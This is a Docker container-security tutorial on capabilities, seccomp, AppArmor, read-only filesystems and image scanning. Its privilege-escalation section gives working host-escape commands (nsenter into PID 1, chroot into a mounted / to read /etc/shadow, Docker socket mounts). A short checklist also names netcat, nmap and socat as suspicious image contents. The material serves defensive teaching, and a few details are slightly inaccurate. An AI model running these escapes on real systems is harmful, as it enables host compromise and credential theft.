Docker Security Examples

Docker Security Examples

Containers share the host kernel — the only barriers between a container process and full host compromise are Linux security primitives: namespaces, cgroups, capabilities, seccomp, and mandatory access control (AppArmor/SELinux). Understanding how these controls work, and how attackers bypass them, is fundamental to securing any container workload.

This tutorial walks through practical Docker security scenarios:

  1. Linux capabilities — drop all, add only what's needed, and observe the difference
  2. Seccomp profiles — restrict which syscalls a container can make
  3. AppArmor profiles — mandatory access control for file and network operations
  4. Privilege escalation techniques — how --privileged, hostPID, and nsenter give attackers full host access
  5. Read-only filesystems — prevent runtime tampering with --read-only and tmpfs
  6. Host mount dangers — why -v /:/host is equivalent to giving away root
  7. Image inspection — audit layers and scan for vulnerabilities before running

Each example is designed to be run locally with Docker — no Kubernetes cluster required.


Prerequisites

  • Docker installed and running
  • Basic familiarity with Linux permissions and processes
  • A terminal (all examples use standard Docker CLI)
mkdir -p ~/docker-security-lab && cd ~/docker-security-lab

Linux Capabilities

Linux capabilities split the monolithic root privilege into discrete units. Instead of granting a process full root power, you grant only the specific capabilities it needs. Docker containers start with a reduced capability set, but it's still more than most workloads require.

View Default Container Capabilities

# Run a container and list its capabilities
docker run --rm -it alpine:latest /bin/sh -c "apk add -q libcap && capsh --print"

The output shows the capability bounding set — these are the maximum privileges available to processes inside the container.

Drop All Capabilities

Dropping all capabilities is the most restrictive baseline. Most applications will still run — they just can't perform privileged operations like binding to low ports, changing file ownership, or sending raw network packets.

# Drop ALL capabilities — ping fails because it needs CAP_NET_RAW
docker run --rm --cap-drop ALL alpine:latest /bin/sh -c \
    "ping -c1 -W2 127.0.0.1"

Expected output: ping: permission denied (are you running as root?)

Add Back Only What's Needed

# Add CAP_NET_RAW back — ping works again
docker run --rm --cap-drop ALL --cap-add NET_RAW alpine:latest /bin/sh -c \
    "ping -c1 -W2 127.0.0.1"

Expected output: 1 packets transmitted, 1 packets received, 0% packet loss

Common Capabilities and Their Risk

Capability What it allows Risk level
NET_RAW Raw sockets (ping, packet crafting) Medium — enables ARP spoofing
NET_ADMIN Network configuration changes High — can sniff traffic, modify routes
SYS_ADMIN Mount filesystems, manage namespaces Critical — near-root access
SYS_PTRACE Trace and debug processes High — can read memory of other processes
DAC_OVERRIDE Bypass file permission checks High — read/write any file
SETUID / SETGID Change process UID/GID High — escalate to any user

Best practice: Always use --cap-drop ALL as the baseline and add back only the specific capabilities your application requires. Document why each capability is needed.

# Example: web server that only needs to bind to port 80
docker run --rm --cap-drop ALL --cap-add NET_BIND_SERVICE \
    -p 8080:80 nginx:alpine

Seccomp Profiles

Seccomp (Secure Computing Mode) filters which system calls a container process can execute. Docker applies a default seccomp profile that blocks approximately 44 of the 300+ Linux syscalls, including dangerous ones like mount, reboot, and kexec_load.

Running Without Seccomp (Dangerous)

Disabling seccomp removes all syscall filtering — the container process can invoke any syscall the kernel supports.

# Without seccomp: unshare succeeds — the process can create new namespaces
docker run --rm -it --security-opt seccomp=unconfined alpine:latest \
    unshare --map-root-user --user /bin/sh -c "whoami && id"

This works because unshare requires the CLONE_NEWUSER syscall, which the default seccomp profile blocks.

Running With the Default Profile

# With default seccomp: unshare is blocked
docker run --rm -it alpine:latest \
    unshare --map-root-user --user /bin/sh -c "whoami && id"

Expected: unshare: unshare(0x10000000): Operation not permitted

Using a Custom Seccomp Profile

Download Docker's default profile and customize it:

# Download the default seccomp profile
curl -sO https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json

# Inspect which syscalls are allowed
cat default.json | python3 -m json.tool | grep -c "name"

Create a stricter profile that also blocks chmod and chown:

cat > strict-seccomp.json << 'SECCOMP'
{
    "defaultAction": "SCMP_ACT_ERRNO",
    "defaultErrnoRet": 1,
    "architectures": [
        "SCMP_ARCH_X86_64",
        "SCMP_ARCH_AARCH64"
    ],
    "syscalls": [
        {
            "names": [
                "accept", "accept4", "access", "bind", "brk", "capget",
                "capset", "chdir", "clone", "close", "connect", "dup",
                "dup2", "dup3", "epoll_create", "epoll_create1",
                "epoll_ctl", "epoll_wait", "epoll_pwait", "execve",
                "exit", "exit_group", "faccessat", "fchdir", "fcntl",
                "fstat", "fstatfs", "futex", "getcwd", "getdents64",
                "getegid", "geteuid", "getgid", "getpeername",
                "getpid", "getppid", "getrandom", "getsockname",
                "getsockopt", "getuid", "ioctl", "listen", "lseek",
                "madvise", "mmap", "mprotect", "munmap", "nanosleep",
                "newfstatat", "open", "openat", "pipe", "pipe2",
                "poll", "ppoll", "prctl", "pread64", "prlimit64",
                "pwrite64", "read", "readlink", "readlinkat",
                "recvfrom", "recvmsg", "rename", "rt_sigaction",
                "rt_sigprocmask", "rt_sigreturn", "select",
                "sendmsg", "sendto", "set_robust_list",
                "set_tid_address", "setsockopt", "shutdown",
                "sigaltstack", "socket", "stat", "statfs",
                "sysinfo", "tgkill", "uname", "unlink", "wait4",
                "write", "writev"
            ],
            "action": "SCMP_ACT_ALLOW"
        }
    ]
}
SECCOMP
# Run with the strict profile — chmod is now blocked
docker run --rm -it --security-opt seccomp=./strict-seccomp.json \
    alpine:latest /bin/sh -c "touch /tmp/test && chmod 777 /tmp/test"

Expected: chmod: /tmp/test: Operation not permitted


AppArmor Profiles

AppArmor provides mandatory access control at the filesystem and network level. Docker's default AppArmor profile (docker-default) restricts containers from writing to /proc and /sys, mounting filesystems, and accessing certain devices.

Check the Default AppArmor Profile

# Verify AppArmor is loaded (Linux hosts only)
sudo aa-status 2>/dev/null | head -20

# Run with the default profile explicitly
docker run --rm -it --security-opt apparmor=docker-default \
    alpine:latest /bin/sh -c "cat /proc/sysrq-trigger"

Create a Custom AppArmor Profile

Write a restrictive profile that prevents a container from writing to anything except /tmp:

sudo tee /etc/apparmor.d/docker-restricted << 'EOF'
#include <tunables/global>

profile docker-restricted flags=(attach_disconnected,mediate_deleted) {
    #include <abstractions/base>

    # Allow read access to most paths
    / r,
    /** r,

    # Only allow writes to /tmp
    /tmp/** rw,

    # Deny writes everywhere else
    deny /etc/** w,
    deny /usr/** w,
    deny /var/** w,
    deny /home/** w,
    deny /root/** w,

    # Deny raw network access
    deny network raw,

    # Deny mount operations
    deny mount,

    # Allow necessary capabilities
    capability net_bind_service,
    capability setuid,
    capability setgid,
}
EOF

# Load the profile
sudo apparmor_parser -r /etc/apparmor.d/docker-restricted
# Test: writing to /etc fails
docker run --rm -it --security-opt apparmor=docker-restricted \
    alpine:latest /bin/sh -c "echo test > /etc/test.txt"

# Test: writing to /tmp succeeds
docker run --rm -it --security-opt apparmor=docker-restricted \
    alpine:latest /bin/sh -c "echo test > /tmp/test.txt && cat /tmp/test.txt"

Privilege Escalation Techniques

Understanding how attackers escalate privileges from inside a container helps you defend against these patterns. Each technique below exploits a specific Docker misconfiguration.

Technique 1: --privileged Flag

The --privileged flag disables all container isolation — capabilities, seccomp, AppArmor, device cgroups, and namespace restrictions are removed. The container process has the same access as a root process on the host.

# Privileged container can see ALL host devices
docker run --rm -it --privileged alpine:latest /bin/sh -c \
    "fdisk -l 2>/dev/null | head -20"

The container can see and interact with host block devices, mount host filesystems, load kernel modules, and access every hardware device.

Technique 2: nsenter with Host PID Namespace

When a container shares the host's PID namespace (--pid=host), it can see all host processes. Combined with --privileged, nsenter lets you enter the host's mount, UTS, network, and IPC namespaces — effectively escaping the container entirely.

# Full host escape: nsenter into PID 1 (the host's init process)
docker run --rm -it --privileged --pid=host alpine:latest \
    nsenter -t 1 -m -u -n -i /bin/sh -c "hostname && whoami && cat /etc/hostname"

What each nsenter flag does:

Flag Namespace Effect
-t 1 Target Attach to PID 1 (host init)
-m Mount See the host filesystem
-u UTS See the host hostname
-n Network See the host network stack
-i IPC See the host IPC resources

This command gives you an interactive shell as root on the host. From here, you can read /etc/shadow, install packages, modify systemd services, or pivot to other machines on the network.

Technique 3: Host Filesystem Mount

Mounting the host root filesystem into a container provides direct read/write access to everything on the host:

# Mount the host root filesystem at /host
docker run --rm -it -v /:/host alpine:latest /bin/sh -c \
    "chroot /host /bin/sh -c 'cat /etc/shadow | head -5'"

This works even without --privileged if the user running Docker has permission to bind-mount /. The chroot then pivots into the host filesystem, giving the process full host context.

Technique 4: Docker Socket Mount

Mounting the Docker socket gives the container control over the Docker daemon — it can create new privileged containers, access volumes, and effectively control the host:

# Mount the Docker socket — the container can now manage Docker
docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock \
    docker:latest docker ps

From here, an attacker can launch a privileged container with the host filesystem mounted — achieving full host compromise in two steps.

Defense: Never mount the Docker socket into application containers. Use rootless Docker or Podman for environments where containers need to build other containers.


Read-Only Filesystems and tmpfs

Running containers with --read-only prevents any writes to the container's root filesystem. This blocks attackers from downloading tools, modifying configs, or writing persistence mechanisms.

Basic Read-Only Container

# Read-only root filesystem — writes fail
docker run --rm -it --read-only alpine:latest /bin/sh -c \
    "echo 'malware' > /tmp/payload"

Expected: can't create /tmp/payload: Read-only file system

Read-Only with tmpfs for Required Write Paths

Most applications need to write to a few specific paths (temp files, PID files, logs). Use tmpfs mounts for these — they exist only in memory and are never written to disk.

# Read-only with tmpfs for /tmp — application writes work, nothing persists
docker run --rm -it --read-only --tmpfs /tmp:rw,noexec,nosuid \
    alpine:latest /bin/sh -c \
    "echo 'tempdata' > /tmp/test && cat /tmp/test && ls -la /tmp/"

Key tmpfs mount options:

Option Effect
rw Allow read/write (default for tmpfs)
noexec Prevent executing binaries from tmpfs — blocks attackers from running downloaded payloads
nosuid Ignore SUID/SGID bits — prevents privilege escalation via setuid binaries
size=64m Limit tmpfs size — prevents memory exhaustion attacks

Running as Non-Root with Read-Only Filesystem

Combine --read-only, --tmpfs, non-root user, and dropped capabilities for a hardened container:

# Create a test image with a non-root user
cat > /tmp/Dockerfile.secure << 'EOF'
FROM alpine:latest
RUN adduser -D -u 1000 appuser
USER appuser
WORKDIR /home/appuser
CMD ["sh"]
EOF

docker build -t secure-test -f /tmp/Dockerfile.secure /tmp

# Run with full hardening
docker run --rm -it \
    --read-only \
    --tmpfs /tmp:rw,noexec,nosuid,size=64m \
    --cap-drop ALL \
    --security-opt no-new-privileges \
    -u 1000:1000 \
    secure-test /bin/sh -c "whoami && id && touch /tmp/ok && echo 'write works in /tmp'"

The --security-opt no-new-privileges flag prevents the process from gaining additional privileges through SUID binaries or capability inheritance — even if an attacker finds a setuid binary inside the container, they cannot exploit it.


Host Network Dangers

Using --network=host removes network namespace isolation — the container shares the host's network stack, can bind to any port, and can sniff all host traffic.

# Host network: nginx binds directly to the host's port 80
docker run --rm -d --network=host --name host-nginx nginx:alpine

# Verify it's listening on the host's network interface
curl -s -o /dev/null -w "%{http_code}" http://localhost:80

# Cleanup
docker stop host-nginx

Why this is dangerous:

  • The container can bind to any port on the host, potentially hijacking services
  • Network monitoring tools inside the container can capture all host traffic
  • The container can communicate with services bound to 127.0.0.1 on the host (databases, admin interfaces)
  • No port mapping is needed — the container bypasses Docker's network proxy entirely

Best practice: Use Docker's bridge network (default) or custom networks. Only use --network=host when absolutely required for performance-critical network applications, and combine it with other security controls.


Image Inspection and Vulnerability Scanning

Before running any image — especially from public registries — inspect its contents and scan for known vulnerabilities.

Inspect Image Layers and History

# Pull an image
docker pull ubuntu/squid:latest

# View the full build history — shows every Dockerfile instruction
docker history --no-trunc ubuntu/squid:latest

Look for suspicious patterns in the history:

  • curl or wget fetching unknown URLs
  • Scripts executed during build (RUN bash -c "...")
  • Environment variables containing credentials or tokens
  • Layers that install tools like netcat, nmap, or socat

Scan with Trivy

# Scan for HIGH and CRITICAL vulnerabilities
trivy image --severity HIGH,CRITICAL ubuntu/squid:latest

# Scan and output as JSON for pipeline integration
trivy image --severity HIGH,CRITICAL -f json -o scan-results.json \
    ubuntu/squid:latest

# Scan a local Dockerfile for misconfigurations
trivy config /tmp/Dockerfile.secure

Inspect a Running Container's Filesystem

# Start a container to inspect
docker run -d --name inspect-target alpine:latest sleep 3600

# Export the filesystem as a tar and examine
docker export inspect-target | tar -tf - | head -50

# Look for suspicious files in writable locations
docker export inspect-target | tar -tf - | grep -E "(tmp|dev/shm|var/tmp)/"

# Check for SUID binaries
docker exec inspect-target find / -perm -4000 -type f 2>/dev/null

# Cleanup
docker stop inspect-target && docker rm inspect-target

Verify Image Signatures with Cosign

For images signed with Sigstore cosign:

# Verify an image signature
cosign verify --key cosign.pub <registry>/<image>:<tag>

# Verify with keyless signing (Sigstore transparency log)
cosign verify \
    --certificate-identity <signer-email> \
    --certificate-oidc-issuer https://accounts.google.com \
    <registry>/<image>:<tag>

Putting It All Together: Secure Container Checklist

Run containers with the maximum practical restrictions:

# Production-hardened container run command
docker run -d \
    --name my-app \
    --read-only \
    --tmpfs /tmp:rw,noexec,nosuid,size=64m \
    --cap-drop ALL \
    --cap-add NET_BIND_SERVICE \
    --security-opt no-new-privileges \
    --security-opt seccomp=./strict-seccomp.json \
    --security-opt apparmor=docker-restricted \
    --memory 512m \
    --cpus 1 \
    --pids-limit 100 \
    -u 1000:1000 \
    --network my-app-net \
    -p 8080:8080 \
    my-app:latest

What each flag does:

Flag Security control
--read-only Immutable root filesystem
--tmpfs /tmp:noexec Writable temp that blocks binary execution
--cap-drop ALL Remove all Linux capabilities
--cap-add NET_BIND_SERVICE Add back only what's needed
--no-new-privileges Block SUID/capability escalation
--seccomp= Custom syscall filter
--apparmor= Mandatory access control profile
--memory 512m Prevent memory exhaustion
--cpus 1 Prevent CPU exhaustion
--pids-limit 100 Prevent fork bombs
-u 1000:1000 Run as non-root user
--network my-app-net Isolated network (not host)

Lab Cleanup

# Remove any running lab containers
docker rm -f falco-test secure-test inspect-target host-nginx 2>/dev/null

# Remove lab images
docker rmi secure-test 2>/dev/null

# Remove generated files
rm -f strict-seccomp.json default.json scan-results.json
rm -f /tmp/Dockerfile.secure

# Remove custom AppArmor profile (if created)
sudo apparmor_parser -R /etc/apparmor.d/docker-restricted 2>/dev/null
sudo rm -f /etc/apparmor.d/docker-restricted

# Remove lab directory
rm -rf ~/docker-security-lab/

Next Steps